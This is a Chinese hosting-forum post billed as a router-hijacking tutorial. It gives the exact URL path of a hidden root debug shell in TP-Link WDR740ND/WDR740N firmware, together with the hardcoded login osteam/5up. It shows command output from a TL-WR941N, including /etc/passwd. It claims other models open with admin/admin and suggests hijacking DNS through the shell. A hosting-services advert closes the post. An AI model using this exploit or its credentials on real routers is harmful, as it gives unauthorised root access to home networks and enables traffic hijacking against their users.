主机头

 找回密码
 立即注册
查看: 2448|回复: 0
打印 上一主题 下一主题

TP-Link WDR740ND的路由shell-路由劫持教程

[复制链接]

878

主题

2

好友

5472

积分

管理员

Rank: 9Rank: 9Rank: 9

跳转到指定楼层
楼主
发表于 2013-5-27 07:25:57 |只看该作者 |倒序浏览
这个牛逼,分享如何劫持,如何用路由劫持DNS等各种DIY。

嘿嘿。很给力的。

TP-Link  WDR740ND/WDR740N 路由器有一个隐藏的调试功能的shell,可以root权限,可能会被攻击者滥用。

固件版本:3.12.11 Build 111130 Rel.55312n and possibly others

exp url : http://IP/userRpmNatDebugRpm26525557/linux_cmdline.html

User: osteam  Password: 5up

使用这个shell 攻击者可能会添加恶意的路由规则或更改配置文件。

==============以上是废话==============

过客的路由器是:TP-Link TL-WR941N
软件版本:3.11.7 Build 100723 Rel.46142n
硬件版本:WR941N v4/v5 00000000
  1. cat /proc/cpuinfo&
  2. 827
  3. # system type                : Atheros AR7240 (Python)
  4. processor                : 0
  5. cpu model                : MIPS 24K V7.4
  6. BogoMIPS                : 265.21
  7. wait instruction        : yes
  8. microsecond timers        : yes
  9. tlb_entries                : 16
  10. extra interrupt vector        : yes
  11. hardware watchpoint        : yes
  12. ASEs implemented        : mips16
  13. VCED exceptions                : not available
  14. VCEI exceptions                : not available

  15. cat /etc/passwd&
  16. 828
  17. # root:x:0:0:root:/root:/bin/sh
  18. Admin:x:0:0:root:/root:/bin/sh
  19. bin:x:1:1:bin:/bin:/bin/sh
  20. daemon:x:2:2:daemon:/usr/sbin:/bin/sh
  21. adm:x:3:4:adm:/adm:/bin/sh
  22. lp:x:4:7:lp:/var/spool/lpd:/bin/sh
  23. sync:x:5:0:sync:/bin:/bin/sync
  24. shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
  25. halt:x:7:0:halt:/sbin:/sbin/halt
  26. uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
  27. operator:x:11:0:Operator:/var:/bin/sh
  28. nobody:x:65534:65534:nobody:/home:/bin/sh
  29. ap71:x:500:0:Linux User,,,:/root:/bin/sh

  30. cat /proc/meminfo&
  31. 843
  32. # MemTotal:        30676 kB
  33. MemFree:         12876 kB
  34. Buffers:          1836 kB
  35. Cached:           6056 kB
  36. SwapCached:          0 kB
  37. Active:           6116 kB
  38. Inactive:         3892 kB
  39. HighTotal:           0 kB
  40. HighFree:            0 kB
  41. LowTotal:        30676 kB
  42. LowFree:         12876 kB
  43. SwapTotal:           0 kB
  44. SwapFree:            0 kB
  45. Dirty:               0 kB
  46. Writeback:           0 kB
  47. Mapped:           4276 kB
  48. Slab:             5436 kB
  49. CommitLimit:     15336 kB
  50. Committed_AS:     4324 kB
  51. PageTables:        276 kB
  52. VmallocTotal:  1048560 kB
  53. VmallocUsed:      1944 kB
  54. VmallocChunk:  1046464 kB

  55. # ls /
  56. bin      etc      linuxrc  proc     sbin     usr      web
  57. dev      lib      mnt      root     tmp      var
  58. #
复制代码
2041N 我也进去了 账户是 admin admin
841n刚才试了下也可以


具体怎么操作可以继续研究研究。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册


感谢支持主机头,如果有问题可以联系我的QQ。目前提供各种服务。
网站建设,网站优化,美国VPS购买,VPS环境配置等。
目前通过本站购买VPS的话,可以免费帮忙配置环境。
付费提供DISCUZ PW DEDECMS技术支持。
www.www88.me
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

主机头版权声明|百度地图|谷歌地图|Archiver|手机版|主机头

GMT+8, 2024-10-30 15:27

Powered by Discuz! www.zhujitou.com

© 2001-2012 主机头.

回顶部